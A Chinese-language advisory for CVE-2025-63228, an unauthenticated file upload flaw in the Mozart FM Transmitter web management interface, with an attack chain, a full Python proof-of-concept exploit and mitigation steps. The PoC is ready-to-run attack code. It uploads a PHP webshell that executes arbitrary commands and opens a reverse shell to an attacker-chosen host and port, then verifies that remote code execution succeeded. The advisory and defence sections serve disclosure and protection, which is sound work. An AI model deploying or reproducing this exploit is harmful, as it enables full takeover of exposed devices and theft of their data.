CVE-2025-63228 | Mozart FM Transmitter未授权文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-63228

漏洞类型

未授权文件上传/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Mozart FM Transmitter Web Management Interface (WEBMOZZI-00287)

漏洞概述

CVE-2025-63228是Mozart FM Transmitter网络管理界面中存在的一个严重安全漏洞，CVSS评分高达9.8，属于严重级别。该漏洞存在于WEBMOZZI-00287版本的Web管理接口中，具体位于/upload_file.php端点。漏洞的根本原因在于该文件上传功能缺乏适当的身份验证机制，允许未经授权的攻击者直接访问并使用文件上传功能。攻击者可以利用此漏洞上传任意文件，包括恶意的PHP webshell脚本。一旦webshell成功上传，攻击者便可以在服务器上执行任意系统命令，从而实现远程代码执行(RCE)，最终导致整个系统的完全沦陷。攻击者获得服务器控制权后，可以窃取敏感数据、植入后门、横向移动到内网其他系统，或将服务器作为进一步攻击的跳板。由于该漏洞无需任何认证即可利用，且可以通过网络远程触发，因此构成了极高的安全风险。建议受影响的用户立即采取防护措施，避免遭受潜在的网络攻击。

技术细节

该漏洞属于经典的未授权文件上传漏洞，存在于Mozart FM Transmitter设备的Web管理界面中。漏洞端点为/upload_file.php，该端点在处理文件上传请求时未实施任何身份验证和授权检查机制。攻击者可以通过构造恶意的POST请求，向该端点发送精心设计的文件内容。在正常情况下，安全的文件上传功能应该对上传文件的类型、内容、大小等进行严格检查，并限制可执行文件的上传。然而，由于该端点缺少这些安全措施，攻击者可以上传.php文件格式的webshell脚本。上传的文件会被存储在服务器的/upload/目录中，这个目录通常对Web服务器是可访问的。攻击者随后可以通过直接访问上传的webshell文件（如http://target.com/upload/malicious.php）来触发恶意代码的执行。由于PHP代码在服务器端执行，webshell允许攻击者在服务器上执行任意系统命令，实现远程代码执行。这种攻击方式使得攻击者能够完全控制受影响的服务器，执行特权操作，访问敏感数据，甚至进一步渗透内网环境。整个攻击过程无需任何凭证，仅需要能够访问目标服务器的Web接口即可。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标为Mozart FM Transmitter设备，确认版本为WEBMOZZI-00287，并探测到Web管理界面可访问

STEP 2

2. 发现漏洞端点

攻击者访问并识别出存在未授权文件上传漏洞的/upload_file.php端点

STEP 3

3. 构造恶意文件

攻击者创建包含恶意PHP代码的webshell文件，用于实现远程命令执行功能

STEP 4

4. 发送恶意请求

攻击者构造POST请求，向/upload_file.php端点发送恶意webshell文件，无需任何身份验证

STEP 5

5. 文件上传成功

服务器将攻击者上传的webshell文件存储到/upload/目录中，文件名为shell.php

STEP 6

6. 访问webshell

攻击者通过HTTP请求访问上传的webshell文件，触发恶意PHP代码执行

STEP 7

7. 远程代码执行

通过webshell在服务器上执行任意系统命令，实现远程代码执行(RCE)

STEP 8

8. 系统完全控制

攻击者获取服务器完全控制权，可窃取数据、植入后门、横向移动等，造成严重安全后果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63228 PoC - Mozart FM Transmitter Unauthenticated File Upload
# Target: Mozart FM Transmitter WEBMOZZI-00287
# Endpoint: /upload_file.php
# Impact: Remote Code Execution via PHP Webshell Upload

def exploit(target_url, lhost, lport):
    """
    Exploit the unauthenticated file upload vulnerability in Mozart FM Transmitter
    
    Args:
        target_url: Base URL of the target (e.g., http://192.168.1.100)
        lhost: Attacker IP for reverse shell
        lport: Attacker port for reverse shell
    """
    
    # Generate PHP webshell with reverse shell
    webshell_content = f"""<?php
    // CVE-2025-63228 - Mozart FM Transmitter Webshell
    // This webshell provides command execution capability
    
    if(isset($_GET['cmd'])) {{
        $cmd = $_GET['cmd'];
        $output = shell_exec($cmd);
        echo "<pre>$output</pre>";
    }}
    
    // Reverse shell functionality
    if(isset($_GET['reverse'])) {{
        $sock = fsockopen("{lhost}", {lport});
        $proc = proc_open("/bin/sh", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
        proc_close($proc);
    }}
    ?>"""
    
    # Prepare the exploit
    upload_url = f"{target_url}/upload_file.php"
    
    files = {
        'file': ('shell.php', webshell_content, 'application/x-php')
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }
    
    print(f"[*] Exploiting CVE-2025-63228")
    print(f"[*] Target: {target_url}")
    print(f"[*] Uploading webshell to {upload_url}")
    
    try:
        # Send the malicious file upload request (no authentication required)
        response = requests.post(upload_url, files=files, headers=headers, timeout=10)
        
        if response.status_code == 200:
            # Determine the uploaded file location
            webshell_url = f"{target_url}/upload/shell.php"
            print(f"[+] Webshell uploaded successfully!")
            print(f"[+] Webshell URL: {webshell_url}")
            print(f"[+] Execute commands via: {webshell_url}?cmd=whoami")
            print(f"[+] Get reverse shell via: {webshell_url}?reverse=1")
            
            # Verify the webshell is accessible
            verify_response = requests.get(f"{webshell_url}?cmd=echo+CVE-2025-63228", timeout=10)
            if 'CVE-2025-63228' in verify_response.text:
                print("[+] Webshell verification successful - RCE achieved!")
                return True
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <lhost> <lport>")
        print(f"Example: python {sys.argv[0]} http://192.168.1.100 192.168.1.50 4444")
        sys.exit(1)
    
    target = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]
    
    exploit(target, lhost, lport)

影响范围

Mozart FM Transmitter WEBMOZZI-00287

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 使用网络层访问控制，限制对Web管理界面的访问，仅允许受信任的管理IP访问；2) 禁用或删除/upload_file.php端点，如果该功能不是必需的；3) 配置Web服务器，使/upload/目录中的文件无法被直接执行（如通过.htaccess配置）；4) 部署Web应用防火墙规则，检测并阻止包含PHP代码特征的可疑上传请求；5) 实施网络监控，密切关注异常的HTTP POST请求和文件上传行为；6) 考虑使用蜜罐（Honeypot）技术诱捕潜在攻击者；7) 定期备份系统配置和数据，以便在遭受攻击后能够快速恢复。